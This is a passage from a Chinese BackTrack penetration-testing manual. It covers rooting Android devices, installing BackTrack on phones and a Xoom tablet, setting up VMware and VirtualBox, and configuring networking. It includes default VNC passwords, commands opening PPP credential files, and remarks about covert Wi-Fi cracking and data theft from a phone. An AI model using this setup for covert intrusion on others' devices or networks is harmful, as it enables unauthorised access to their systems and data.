* daemon started successfully *,这时再到手机的“设置”-“应用程序”-“开发”-“USB 调
试”中打开手机的 USB 调试功能,SuperOneClick 就会自动开始提权操作了,如图3工具自
动提权。
6、我们回到手机上,登录 Android 的“电子市场”(Android Market)安装一款“终端模拟
器”(Terminal Emulator)用来执行命令,当上面执行提权操作成功之后,我们就可以在“终
端模拟器”里面使用 su 命令在转为 root 权限了,如图4。
图3工具自动提权
Neuron security team【N.S.T】 第43/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
图4 提权成功
2. Android 安装 backtrack(电脑中的操作)
在上一步提权成功之后,我们还需要做一些准备工作,首先手机还要从“电子市场”
(Android Market)上安装一个用来连接 VNC 的 androidVNC 工具,另外要下载 Backtrack 5
的 ARM 版 本 , 官 方 的 下 载 地 址 是 : http://www.backtrack-
linux.org/ajax/download_redirect.php?id=BT5-GNOME-ARM.7z,但是由于 backtrack 官方提供
的 arm 镜像大于4G,只能在摩托罗拉的 xoom 平板电脑上用,我们普通的安卓手机用的 SD
卡是 fat32的文件格式,放不下大于4G 的文件,所以不能直接使用 backtrack 官方的 ARM 镜
像。大家到这里下载减缩后的 backtrack img 镜像:http://hackomania.com/BT5/bt.7z.001,
http://hackomania.com/BT5/bt.7z.002,http://hackomania.com/BT5/bt.7z.003。
用 Linux 系统下的 cat 命令合并上面下载的三个压缩文件为 bt.7z 一个文件,命令如:
“cat bt.7z.001 bt.7z.002 bt.7z.003 > bt.7z”,用7z 命令解压合并后的压缩文件:“7z e bt.7z”,
如图5。
Neuron security team【N.S.T】 第44/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
cat bt.7z.001 bt.7z.002 bt.7z.003 > bt.7z 合并文件
7z e bt.7z 解压文件
解压后可以看到以下文件:
bt backtrack 的命令行版本 chroot。
bt.img backtrack 镜像。
startbt 挂载并准备使用 backtrack。
stopbt 卸载并释放所有资源。
installbt.sh 自动配置脚本。
图5
我们还需要按以下方法修改一下 startbt 这个脚本文件如图6。最后新建一个名称为 bt 的
文件夹,把它们全部放进去,把这个 bt 文件夹复制到你手机 SD 卡的根目录下。
把 startbt 这个脚本文中的以下三行 mount -t devpts devpts $mnt/dev/pts mount -t proc proc $mnt/proc mount -t sysfs sysfs $mnt/sys
修改为: busybox mount --bind /dev/pts $mnt/dev/pts busybox mount --bind /proc $mnt/proc busybox mount --bind /sys $mnt/sys
Neuron security team【N.S.T】 第45/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
图 6
3. Android 安装 backtrack(手机中的操作)
在做完上面的一些准备工作之后,我们回到手机中打开 Terminal Emulator(终端仿真
器)上运行以下命令自动配置 backtrack,
su 转为 root 用户
cd /sdcard/bt 跳转到 sd 卡的 bt 目录下面
sh installbt.sh 运行配置脚本
startbt 启动 backtrack
bt 进入 backtrack 的命令行界面
上面的命令执行成功后就可以在命令行中使用 backtrack 了,当然还可以通过
androidVNC 连接 backtrack 的图形界面,首先要使用 ui命令启动 backtrack的 VNC服务,
默认密码是12345678,你可以使用 BT的 vncpasswd命令更改这个密码,当你要关闭 VNC时
可以使用 killui命令来停止运行 vncserver。
打开手机的 androidVNC 配置以下信息,连接 backtrack 的 VNC 即可打开漂亮的图形界
面,如图7,但是图形界面打开的速度就要看你手机的性能了,有些手机打开会比较慢,这
时我们就可以开始一些渗透操作了,如图8是在诺基亚的 N900上面进行破解无线密码。
Nick : BackTrack (bt for short)
address : localhost
port : 5901
password : 12345678
Neuron security team【N.S.T】 第46/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
图7
4. 结束语
上面介绍的是在安卓的手机上面安装 backtrack 渗透测试系统,当然我们单独安装某款
渗透工具也是可行的,从上面的介绍可以看出使用智能手机或平板电脑来进行渗透测试的可
行性。可想而知,此后我们的信息安全面临的威胁必然更加严峻,特别是对于这些智能终端
的取证更加艰难,因为它们比起普通的电脑来说更加容易隐藏和销毁。一个人拿着手机站在
你身旁,你根本不知道他在干嘛,也许他正在窃取着你手机中的信息呢。
第三节. Motorola Xoom 平板电脑使用 backtrack
akast 不推荐使用手机来玩 backtrack,其一是手机的屏幕小。其二是手机的性能比不上平板,跑起 backtrack 会很卡
的。本文示例使用的 XOOM 型号是 MZ606的,不过还是推荐 MZ600,但是不论是什么型号都好,刚买回来的都是没有和
Google 电子市场的,也就是说不能安装 android VNC 和 terminal 这些工具,所以我们需要先提升权限和安装 Google 的服
务组件。
一、 系统更新
新买的 XOOM 先进入系统,连接上 WIFI,然后点击“设置”——“关于平板电脑”——“系统更新”,让系统自动更新
到最新版本,我的是从3.0.1更新到3.1。因为3.0是没有 Recovery 模式的,系统自动更新完之后先不要安装其他东西,因
为下一步解锁时会清空 XOOM 里面的所有数据的。
Neuron security team【N.S.T】 第47/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
二、 解锁 BootLoader
在继续下面的操作之前必须先要解锁,否则进行不了,解锁会清空你设备上全部的数据,包括设备本身的数据和内部
硬盘的全部数据!
解锁要连接到电脑,所以电脑要先安装好驱动程序 MotoHelper_2132_Driver_54.exe(图1),驱动、解锁工具和刷
Recovery 工具都可以在这里下载:http://kuai.xunlei.com/d/EOWQJWMDRPMS,安装好驱动之后,按“音量键下+开机键”
就可以打开并进入 XOOM 的 fastboot 模式,XOOM 显示屏会有提示:“starting fastboot protocol support”,此时用 USB
线把 XOOM 连接到电脑,我的电脑用的是 Windows 7系统。
(图1)
解锁我们可以使用 Android SDK:(software development kit)软件开发工具包。被软件开发工程师用于为特定的软
件包、软件框架、硬件平台、操作系统等建立应用软件的开发工具的集合,Android SDK 指的是 Android 专属的软件开发
工具包。下载地址:http://developer.android.com/sdk/index.html,或者直接下载从 SDK 中提取出来的 fastboot.exe
也行。解锁完成后 Xoom 自动会重启,解锁命令如下(图2)。
在电脑上的操作命令:
fastboot.exe devices 查找设备
fastboot.exe oem unlock 开始解锁
XOOM 屏幕会显示:
current choice》 I Accept 按“音量下”将改 I Accept,按“音量上”确认。
current choice》 Yes 按“音量下”将改 Yes,按“音量上”确认。
Neuron security team【N.S.T】 第48/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
(图2)
三、 刷入 CM Recovery
Recovery 是安卓系统的一个特殊工作模式,使用它可以在未开机的状态下实现系统更新、还原出厂设置、清除手机缓
存等。通过一些第三方工具,还可以实现系统的备份、还原、安装主题等,我们这里使用 Cyanogen Mod 的 Recovery。
Cyanogen Mod(简称 CM)是一个国外非常著名的 Android 第三方固件项目,由 Cyanogen 团队基于 Android 的开源项
目编译而来,由于其高效、简洁、稳定的特性,已经成为了机友们体验最新 Android 系统的首选 ROM。
该项目开始于2008年9月份 HTC Dream 的发布,当时大部分的玩家都在探索如何让手机获取 root 权限,在 Android 开
源项目发布之后,这个目标终于得到了实现,Cyanogen 团队开始为 HTC Dream 创建自定义软件。在 v4.1.11.1版本之前,
Cyanogen Mod 都包含了 Google 私有的一系列服务,包括 Google Talk,YouTube,Gmail 等应用。后来(2009年9月)
Google 给 Cyanogen 团队发出了律师函,要求对方停止集成 Google 的一系列程序。所以现在 Cyanogen Mod 将 ROM 分拆成
了两部分,一部分完全是开源的 Android 固件,另外一部分则是 Google 的服务包。
在进行了上一步解锁之后,我们再次进入 XOOM的 fastboot模式,进行以下操作即可刷入 CM Recovery(图3):
在电脑上的操作命令:
fastboot.exe devices 查找设备
fastboot.exe flash recovery recovery.img 安装 Recovery 镜像
fastboot.exe reboot 重启设备
Neuron security team【N.S.T】 第49/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
(图3)
四、 获取 root 权限
这一步我们有两种选择,其一是直接在你目前的系统里做权限提升。其二是刷已经是 root权限的 android 系统,然后
再装 Google 服务包。我这里选择的是第二种方法,直接刷已经有 root 权限的 Eos-wingray-70.zip 包和
EOS_GApps_ics_4.0.3_v10.5.zip Google 服务包,下载地址:http://kuai.xunlei.com/d/EKJJVUNSBYTG 。
首先下载两个 zip 文件包到外部 SD 卡中,不需要解压,把卡插入到 XOOM 中,然后打开 XOOM 进入 recovery 模式,接
着进行 wipe data、wipe cache 和 advanced 中的 wipe Dalvik cache。
进入 recovery 模式的方法:关机状态下按开机出现 M 标志(2 秒左右)按“音量下”进入模式选择状态,分别可以进
入 Fastboot、Recovery、RSD等三种模式。此时按“音量下”可以转换三种模式,xoom 屏幕左上有提示,这时想要进入哪
个模式,按“音量键上”即可确定进入。另外,在 Recovery 模式下“音量上下键”是选择,“关机键”是确认。
自动进行完三种 wipe 之后,就接着回到主菜单,选择“install zip from sdcard”——“choose zip from
sdcard”安装 Eos-wingray-70.zip ROM 包,安装完之后不需要重启,接着安装 EOS_GApps_ics_4.0.3_v10.5.zip GAPPS
包,重新启动 XOOM 即可。
-reboot system now 重启系统
-apply sdcard:update.zip 使用 SD 卡根目录的 update.zip 更新系统
-wipe data/factory reset 清空 data 分区并恢复出厂设置
-wipe cache partition 清空 cache 分区
-install zip from sdcard 从 Sdcard 选择文件更新系统
-backup and restore 备份和恢复
-mounts and storage 挂载和存储
-advanced 高级
-Power off 关机
-GO back 返回上一级
--Reboot Recovery 重启 Recovery
--Wipe Dalvik Cache 清空 Dalvik 缓存
--Wipe Battery Stats 清空电池状态
--Report Error 报告错误
--Key Test 键位测试
Neuron security team【N.S.T】 第50/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
--Partition SD Card 对 SD 卡分区
--Fix Permissions 修复权限
--apply sdcard:update.zip 使用 SD 卡根目录的 update.zip 更新系统
--choose zip from sdcard 从 SD 卡选择 zip 格式升级包
--toggle signature verification 切换签名验证
--toggle script asserts 切换升级脚本检查
五、 安装 backtrack5
我们需要到安卓电子市场里面安装两个工具,只在命令行下面是用 backtrack 的话安装“android terminal
emulator”就行了,如果还需要打开 backtrack 的图形界面就还需要安装“pocketcloud remote VNC”来连接 backtrack
的图形界面, “android VNC viewer”的键盘有问题,所以不推荐使用。
(图4)
从 backtrack 官方地址 http://www.backtrack-linux.org/downloads/ 下载的 BT5-GNOME-ARM.7z 解压
出来,里面有一个 bt5.img.gz 再解压一次,然后把 bt5.img.gz 删掉,在 XOOM 的“内部存储空间”建立一个 bt5的文件
夹,看清楚是“内部存储空间”,不是外插的 SD 卡!把所有解压出来的文件复制到 bt5文件夹里面去(图4)。把
“busybox”、“installbusybox.sh”两个文件都放到“内部存储空间”的根目录(图5)。
Neuron security team【N.S.T】 第51/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
(图5)
打开“android terminal emulator”终端模拟器,安装 busybox 和启动 backtrack(图6)。然后可以使用
pocketcloud remote VNC”来连接 backtrack 的图形界面,默认的 vnc 密码是'toortoor',可以使用 'vncpasswd'命令来
更改 vnc 密码。VNC 端口是5901(图7)。最后你就可以做你想做的事情了(图8)。
su 转为 root 权限
cd /sdcard 跳转到/sdcard 目录
sh installbusybox.sh 安装 busybox
cd /sdcard/bt5 跳转到/sdcard/bt5目录
sh bootbt 启动 backtrack
startvnc 启动 backtrack 的 vnc 服务
stopvnc 关闭 backtrack 的 vnc 服务
Neuron security team【N.S.T】 第52/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
(图6)
(图7)
Neuron security team【N.S.T】 第53/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
(图8)
六、 其他问题
1、 如果在连接电脑的时候在“设备管理器”中出现“设备无法启动”,有两种原因,其一是 USB 接口有问题,最
好换到机箱后边的 USB 接口。其二是驱动安装有问题,请重新安装驱动。
2、 解锁后不能再锁上,否则 XOOM会坏掉!
3、 手机 ROM 是储存手机操作系统的地方,一般情况下为了手机系统的安全是不允许被擦写的,因此操作系统储存
在 ROM 中只能被读取而不能被更改擦写。但是为了系统的升级,可以通过电脑上的程序修改擦写 ROM,平时
说的“刷机”,就是擦写 ROM。
4、 ICS:Android 系统 4.0 命名为 Ice Cream Sandwich,简称 ICS,冰淇淋三明治。
5、 3.0.1 只有 NvFlash、Fastboot、RSD 等三种模式,没有 Recovery 模式,所以要先升级。
Neuron security team【N.S.T】 第54/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第55/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第56/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第57/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第四章. Backtrack 虚拟化
第一节. VMware 安装 backtrack
大家很多时候的工作或学习都还是在 Windows系统下面吧,如果想一边用 Windows一边用 BackTrack
的话呢,就推荐大家使用虚拟机的方式来安装其中一个系统了。
我们可以在实机里面安装 BackTrack,然后在 BackTrack里面安装 VMware,最后再在 VMware里面安
装 Windows,当然也可以反过来,一般我们都是在 Windows下面安装虚拟机。
BackTrack官方已经提供了 BackTrack VMware的镜像包最新版本是5 R2,可以点击
http://www.backtrack-linux.org/downloads/ 下载,然后解压它,不过官方提供的 VMware 版本是32位 gnome
图形界面的,如果你喜欢 KDE 界面或其他版本的话,可以下载 ISO 镜像文件然后自己在虚拟机中安装
它。
接着我们下载安装一个 VMware,建议使用最新版本 VMware Workstation 8,记住千万不要使用绿色
版的 VMware,因为绿色版本的 VMware 简化了很多功能,使用起来非常麻烦。安装完 VMware 之后,就
可以打开解压出来的 BT5R2-GNOME-VM-32.vmx 文件,就可以启动 backtrack 虚拟机了。
打开 Vmware,选择“打开已存在的虚拟机或分组”(open a virtual machine),然后选择您解压出来的
BT5R2-GNOME-VM-32文件夹里面的 BT5R2-GNOME-VM-32.vmx 文件打开就可以了。
Neuron security team【N.S.T】 第58/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第二节. Backtrack5 R2安装 Vmware Tools
再次建议大家,如果要在 vmware workstation 里面使用 backtrack 的话,还是直接下载 backtrack
的 vmware 版 本 , 下 载 地 址 : http://www.backtrack-
linux.org/ajax/download_redirect.php?id=BT5R2-GNOME-VM-32.7z,就不需要安装 vmware tools 了。
由于 Google 的原因,backtrack 5 R2 KDE 版本在安装 vmware tools 的之前先要创建一个
/etc/cups/ppd 目 录 。 要 不 然 会 出 现 这 样 的 错 误 : Unable to create symlink
"/etc/cups/ppd/VMware_Virtual_Printer.ppd" pointing to file "/usr/lib/vmware-
tools/configurator/thinprint.ppd"。整个安装过程如下:
root@bt:~# mkdir /etc/cups/ppd
root@bt:~# prepare-kernel-sources
root@bt:~# mkdir /mnt/cdrom; mount /dev/cdrom /mnt/cdrom
root@bt:~# cp /mnt/cdrom/VMwareTools-<version>.tar.gz /tmp/
root@bt:~# cd /tmp/
root@bt:~# tar zxpf VMwareTools-<version>.tar.gz
root@bt:~# cd vmware-tools-distrib/
root@bt:~# ./vmware-install.pl
第三节. Backtrack5 R1安装 Vmware Tools
Neuron security team【N.S.T】 第59/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
为了方便在虚拟机的使用,所以建议在 Vmware里面安装了 BackTrack之后,最好在 BackTrack 里面
安装一个 VMware Tools,我使用的 VMware Workstation7.1.3自动给 BackTrack安装了 VMware Tools。
在安装 vmware tool之前先要准备好 BT5内核源文件(详细请看下面的准备内核头文件)。
VMware Workstation7.1.3也会有下面的安装提示,所有问题直接回车,使用默认的选项就可以了。
根据提示安装就可以了。
Neuron security team【N.S.T】 第60/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第61/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第62/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第四节. 手动安装 Vmware Tools
如果虚拟机没有自动安装的话,就需要我们手动了安装一下,
第一步:进入 BackTrack的图形界面,点击 VM菜单栏上面的“虚拟机”——“安装 VMTools”
第二步:进入命令界面,在 /mnt 下建立 名为 cdorm 的文件夹 命令为:mkdir /mnt/cdrom
第三步:在命令界面,以 root 权限挂载光驱 命令为: sudo mount /dev/cdrom3 /mnt/cdrom
第四步:切换到 tmp 目录下命令为:cp /mnt/cdrom/VMwareTools-{version}.tar.gz /tmp/,然
后用 tar 命令将 VMTools解压出来 命令为:tar zxpf /mnt/cdrom/VMwareTools-8.4.3-
282344.tar.gz
第五步:切换到 vmware-tools-distrib 目录下,命令为:cd /vmware-tools-distrib
第六步:运行安装程序 vmware-install.pl 命令为:./vmware-install.pl
第七步:使用默认配置,一直确定就行了。
在 VMware Workstation 7.1.3里面使用光盘安装 VMware Tools 的命令:
root@bt:~# mkdir /mnt/cdrom
root@bt:~# mount /dev/cdrom3 /mnt/cdrom/
mount: block device /dev/hdc is write-protected, mounting read-only
root@bt:~# cp -rf /mnt/cdrom/VM* /tmp/
root@bt:~# cd /tmp/
Neuron security team【N.S.T】 第63/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
root@bt:/tmp# tar zxpf VMwareTools-8.4.3-282344.tar.gz
root@bt:/tmp# cd vmware-tools-distrib/
root@bt:/tmp# ./vmware-install.pl
在 VMware Workstation 7.1.2里面使用光盘安装 VMware Tools 的命令:
root@bt:~# mkdir /mnt/cdrom
root@bt:~# mount /dev/cdrom3 /mnt/cdrom/
mount: block device /dev/hdc is write-protected, mounting read-only
root@bt:~# cp -rf /mnt/cdrom/VM* /tmp/
root@bt:~# cd /tmp/
root@bt:/tmp# tar zxpf VMwareTools-8.4.3-282344.tar.gz
root@bt:/tmp# tar xvf vmware-tools-distrib/lib/modules/source/vmxnet.tar
root@bt:/tmp# wget BackTrack-linux.org/patches/vmxnet-301548-2.6.35.patch
root@bt:/tmp# patch -p0 < vmxnet-301548-2.6.35.patch
root@bt:/tmp# tar cvf vmware-tools-distrib/lib/modules/source/vmxnet.tar vmxnet-only
root@bt:/tmp# tar xvf vmware-tools-distrib/lib/modules/source/vsock.tar
root@bt:/tmp# sed -i 's/sk->compat_sk_sleep/compat_sk_sleep(sk)/g' vsock-
only/linux/af_vsock.c
root@bt:/tmp# sed -i 's/listener->compat_sk_sleep/compat_sk_sleep(listener)/g' vsock-
only/linux/af_vsock.c
root@bt:/tmp# tar cvf vmware-tools-distrib/lib/modules/source/vsock.tar vsock-only
root@bt:/tmp# cd vmware-tools-distrib/
root@bt:/tmp# ./vmware-config-tools.pl
其实一句话说明即可:安装了内核文件之后,一路回车下去,全部使用默认配置,安装完毕之后重
新启动 backtrack即可生效,这样在虚拟机和实机之间即可共用剪贴板。
Neuron security team【N.S.T】 第64/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第65/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第五节. 升级 Vmware Tools
官方提供下载的 Backtrack Vmware 镜像里面已经安装好了 VmwareTools,不过大家使用
的 VM 虚拟机是8.0的话还需要更新一下,最新版本的 VmwareTools 是 VMwareTools-8.8.0-
471268.tar.gz。
使用 Vmware workstation 8打开 backtrack 虚拟机会自动提示升级 VmwareTools,或者直
接点击 Vmware workstation 的菜单栏中 VM 菜单里面的升级 VmwareTools。接着 backtrack
会自动打开一个 Vmware Tools 的文件夹,我们把其中的 VMwareTools-8.8.0-471268.tar.gz 文
件复制到 backtrack 的桌面上。
Neuron security team【N.S.T】 第66/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
安装过程如下,其中所有的问答都直接回车确认就行了。
root@bt:~# cd Desktop
root@bt:~/Desktop# ls
VMwareTools-8.8.0-471268.tar.gz
root@bt:~/Desktop# tar zxpf VMwareTools-8.8.0-471268.tar.gz
root@bt:~/Desktop# ls
VMwareTools-8.8.0-471268.tar.gz vmware-tools-distrib
root@bt:~/Desktop# cd vmware-tools-distrib
root@bt:~/Desktop/vmware-tools-distrib# ls
bin doc etc FILES INSTALL installer lib vmware-install.pl
root@bt:~/Desktop/vmware-tools-distrib# ./vmware-install.pl
省略……
You have a version of VMware Tools installed. Continuing this install will
first uninstall the currently installed version. Do you wish to continue?
(yes/no) [yes]
In which directory do you want to install the binary files?
[/usr/bin]
What is the directory that contains the init directories (rc0.d/ to rc6.d/)?
[/etc]
What is the directory that contains the init scripts?
[/etc/init.d]
In which directory do you want to install the daemon files?
[/usr/sbin]
In which directory do you want to install the library files?
[/usr/lib/vmware-tools]
Neuron security team【N.S.T】 第67/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
省略……
第六节. BackTrack 安装 VMware Workstation
The latest VMware Workstation (At the time of writing VMware-Workstation-Full-7.1.3-
324285.i386.bundle) installs flawlessly with the latest BackTrack r2 2.6.35.8 kernel.
It is a simple case of running the ./VMware-Workstation-Full-7.1.3-324285.i386.bundle
and then following the directions in the GUI that pops up.
The VMware programs can then be found in the KDE menu > System.
第七节. Backtrack 安装 Virtual Box
root@bt:~# echo "deb http://download.virtualbox.org/virtualbox/debian intrepid non-
free" >> /etc/apt/sources.list 修改 sources 文件,添加软件源
root@bt:~# wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- |
sudo apt-key add -
OK 下载和安装 Oracle public key
root@bt:~# sudo apt-get update 升级系统
root@bt:~# apt-get install virtualbox-3.1 安装 Virtual Box
Neuron security team【N.S.T】 第68/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
What to do when experiencing GPG error: following signatures were invalid
root@bt:~# sudo -s -H
root@bt:~# apt-get clean
root@bt:~# rm /var/lib/apt/lists/*
root@bt:~# rm /var/lib/apt/lists/partial/*
root@bt:~# mkdir /var/lib/apt/lists/partial
root@bt:~# apt-get clean
root@bt:~# apt-get update
Neuron security team【N.S.T】 第69/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
If you have completed the steps properly you should now be able to launch Virtual Box from
the System section of the KDE menu
第八节. Backtrack 安装 VMware Player
VMware Player 是一个免费的虚拟机,如果不需很专业的 VMware workstation 的话,就
可 以 选 择 VMware Player 了 。 官 方 下 载 地 址 :
http://downloads.vmware.com/d/info/desktop_end_user_computing/vmware_player/4_0 ,下载完
毕之后,设置一下文件的权限,安装很简单,使用默认选项一直 next 下去就行了。
root@bt:~# chmod a+x VMware-Player-3.1.4-385536.i386.bundle
root@bt:~# ./VMware-Player-3.1.4-385536.i386.bundle
Neuron security team【N.S.T】 第70/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第九节. Virtual Box 安装 BackTrack
Download and check the BackTrack iso following this guide
http://www.BackTrack-linux.org/wiki/index.php/Downloading
Install BackTrack following this guide
http://www.BackTrack-linux.org/wiki/index.php/Install_BackTrack_to_Disk
Once BackTrack is installed
Install Virtual Box guest additions in BackTrack
Install lastest dkms package from BT repository
root@bt:~# apt-get update
root@bt:~# apt-get upgrade
root@bt:~# apt-get install dkms
Then
root@bt:~# mount /dev/hdX /mnt/cdrom
root@bt:~# cd /mnt/cdrom
root@bt:~# ./VBoxLinuxAdditions-x86.run
Neuron security team【N.S.T】 第71/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
where /dev/hdX is replaced by your Virtual Box guest additions drive assignment
Follow any onscreen instructions.
Once completed.
root@bt:~# reboot
Now we should check the the guest additions have installed correctly.
So run
root@bt:~# /usr/bin/VBoxClient-all
Then check that the services have started correctly
root@bt:~# ps ax |grep VBoxClient
6351 ? Sl 0:00 /usr/bin/VBoxClient --clipboard
6355 ? Sl 0:01 /usr/bin/VBoxClient --display
6356 ? Sl 0:01 /usr/bin/VBoxClient --seamless
6404 pts/1 S+ 0:01 grep VBoxClient
root@bt:~#
Where you should see output similar to that shown above.
Now we need to make the services autostart when the system boots
root@bt:~# nano /root/.xinitrc
and add this line at the end
exec /usr/bin/VBoxClient-all
^O to save the changes to the file
^X to exit nano
Finally we should now restart our virtual machine just to make sure all the guest additions
and the autostart of the services are working correctly.
root@bt:~# reboot
Enjoy your BackTrack Virtual Box install with all of the Guest additions fully working.
Neuron security team【N.S.T】 第72/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第五章. BackTrack 上网
第一节. 自动获取 IP
记住千万不要使用绿色版或什么简化版的虚拟机!要不然上不了网会让你抓狂!在虚拟机里面使用
自动获取 IP上网,先要启动 VMware DHCP Service、Vmware NAT Service 这两个个系统服务,然后在
“虚拟机设置”——“网络适配器”选项,选择“NAT:使用已共享的主机 IP地址”这项就可以了。
Neuron security team【N.S.T】 第73/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第74/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
自动获取 IP 地址,直接运行 dhclient 命令就可以了,或者使用 dhclient 命令加上网卡号 eth0。
记住可不要把 eth0和 echo搞混了!
root@bt:~# dhclient eth0
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Listening on LPF/eth0/00:0c:29:81:74:21
Sending on LPF/eth0/00:0c:29:81:74:21
Sending on Socket/fallback
DHCPREQUEST of 192.168.1.112 on eth0 to 255.255.255.255 port 67
DHCPACK of 192.168.1.112 from 192.168.1.1
bound to 192.168.1.112 -- renewal in 37595 seconds.
root@bt:~#
Neuron security team【N.S.T】 第75/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第二节. 临时设置 IP 地址
如果需要临时更改 IP 可以使用以下命令,重启系统后这些设置将失效。
root@bt:~# ifconfig eth0 192.168.1.112/24 设置 IP和子网掩码
root@bt:~# route add default gw 192.168.1.1 设置网关地址
root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf 设置 DNS地址
root@bt:~# /etc/init.d/networking restart 重启网卡
第三节. 设置静态 IP 地址
用 ifconfig –a可以查看到您所有的网卡信息,选择您要设置 IP的网卡,使用 vi或者 nano命令
行编辑器来编辑配置文件,我这里用的是 vi编辑器。
按“i”键进入编辑状态,在原有的 iface eth0 inet dhcp 这行前面加上一个#号,注释掉它。然后
换行输入以下信息,平时我们只需要输入 address、netmask、gateway等三个信息就可以了,网络地址
和广播地址可以不用输入,按“Esc”键推出编辑状态,按“Shift+;”接着输入“wq”保存和退出。最
好使用命令:/etc/init.d/networking restart重启网卡这 IP就可以生效了。
root@bt:~# vi /etc/network/interfaces 编辑 IP地址
auto eth0
#iface eth0 inet dhcp
iface eth0 inet static
address 192.168.1.112 IP 地址
Neuron security team【N.S.T】 第76/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
netmask 255.255.255.0 子网掩码
network 192.168.1.0 网络地址
broadcast 192.168.1.255 广播地址
gateway 192.168.1.1 网关地址
root@bt:~# /etc/init.d/networking restart 重启网卡
root@bt:~# vi /etc/resolv.conf 编辑 DNS地址
nameserver 202.96.128.86 设置你合适的 DNS地址
root@bt:~# update-rc.d networking defaults 设置系统启动后自动启用网卡
update-rc.d 命令是用来自动的升级 System V 类型初始化脚本,简单的讲就是哪些东西是您想要系统
在引导初始化的时候运行的,哪些是希望在关机或重启时停止的,可以用它来帮您设置。这些脚本的连
接位于/etc/rcn.d/LnName,对应脚本位于/etc/init.d/Script-name。
1、设置指定启动顺序、指定运行级别的启动项:update-rc.d <service> start <order> <runlevels>
2、设置在指定运行级中,按指定顺序停止:update-rc.d <service> stop <order> <runlevels>
3、从所有的运行级别中删除指定的启动项:update-rc.d -f <script-name> remove
Neuron security team【N.S.T】 第77/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第78/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第四节. ADSL 拨号设置
pppoeconf 会自动检测是哪个网卡连接到 ISP。它会列出所有检测到的网卡,并询问是否已经找到所
有网卡。如果网卡能正确找到,就选择<Yes>按 Enter 键确认。
这个过程主要是输入正确的帐号和密码就可以了,其他的都用默认设置,一直点击 yes 下去直到完成
就 OK了。
root@bt:~# pppoeconf 首次拨号用的设置命令
root@bt:~# pon dsl-provider 手动连接拨号网络
root@bt:~# poff 断开网络连接
root@bt:~# plog 显示拨号日志
root@bt:~# vi /etc/ppp/peers/dsl-provider 查看拨号配置信息
root@bt:~# vi /etc/ppp/chap-secrets 查看拨号用户密码信息
root@bt:~# vi /etc/ppp/pap-secrets 查看拨号用户密码信息
Neuron security team【N.S.T】 第79/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第80/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第81/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第82/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第83/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第五节. 无线网络设置
Wicd是一个既能管理有线网络又能管理无线网络(如 Wifi Radar)的网络接入管理器,我个人习惯用
来管理无线上网,Wicd是一个独立于 network-manager的网络连接管理器(Ubuntu的 apt 系统中不能共
存),它和 Network Manager功能相似并且相互冲突。Wicd是用 Python和 GTK+写成的。wicd位于
extra软件仓库中。在 backtrack 里面已经安装好的了。
使用以下命令启动 wicd,接着在桌面左下角的龙图标那里点开菜单:Internet > Wicd Network
Manager。
root@bt:~# /etc/init.d/wicd start
Neuron security team【N.S.T】 第84/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
使用以下命令设置 wicd在系统启动的时候就自动启用:
root@bt:~# update-rc.d wicd defaults
Neuron security team【N.S.T】 第85/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第86/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
